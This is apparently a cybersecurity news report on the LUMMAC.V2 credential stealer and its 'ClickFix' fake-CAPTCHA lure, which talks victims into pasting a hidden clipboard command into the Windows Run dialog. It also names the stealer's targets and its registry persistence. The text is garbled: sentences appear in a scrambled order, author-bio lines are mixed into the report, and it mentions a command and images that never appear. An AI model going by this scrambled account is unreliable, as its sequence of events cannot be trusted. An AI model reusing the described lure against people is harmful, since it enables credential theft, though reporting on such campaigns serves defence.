The LUMMAC.V2 campaign represents a significant threat not only due to its extensive data theft capabilities but also because it exploits human behavior rather than technical vulnerabilities, making traditional security measures less effective at prevention. When victims land on the fake CAPTCHA page, they’re guided to press Windows+R to open the Run dialog box, then instructed to press CTRL+V to paste a command that has been surreptitiously copied to their clipboard, and finally to press Enter to execute it. Google Cloud Security Community researchers have identified that the ClickFix technique forms the cornerstone of LUMMAC.V2’s attack methodology. Cyber Security News is a Dedicated News Platform For Cyber News, Cyber Attack News, Hacking News & Vulnerability Analysis. This new variant, designated LUMMAC.V2, has been observed targeting a wide range of applications including browsers, cryptocurrency wallets, password managers, remote desktop applications, email clients, and instant messaging platforms. When users click these links, they’re redirected to deceptive websites that present as security verification pages with fake CAPTCHA challenges. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news. The malware’s primary function is to exfiltrate sensitive information such as credentials, logins, emails, personal details, system information, screenshots, and cookies, subsequently compressing this data into a ZIP archive for transmission over HTTP connections. Tushar is a Cyber security content editor with a passion for creating captivating and informative content. The lifecycle shows an example of this deceptive page in action, while the below image reveals the underlying website’s source code designed to execute this attack. The malware propagates through malicious links embedded in search results, especially those related to cracked software, popular movies, or music releases. This technique tricks users into executing commands without realizing they’re initiating malware installation. The ClickFix technique operates by instructing users to perform seemingly innocuous actions that trigger malware execution. Cybersecurity experts have identified a sophisticated evolution of the LUMMAC credential stealer, now rewritten from C to C++ and operating with enhanced capabilities. What makes LUMMAC.V2 particularly dangerous is its distribution method, which relies heavily on social engineering rather than technical exploits. This command downloads and executes additional malicious payloads, establishing persistence by creating registry entries under HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.
This Cyber News was published on cybersecuritynews.com. Publication date: Mon, 05 May 2025 10:40:04 +0000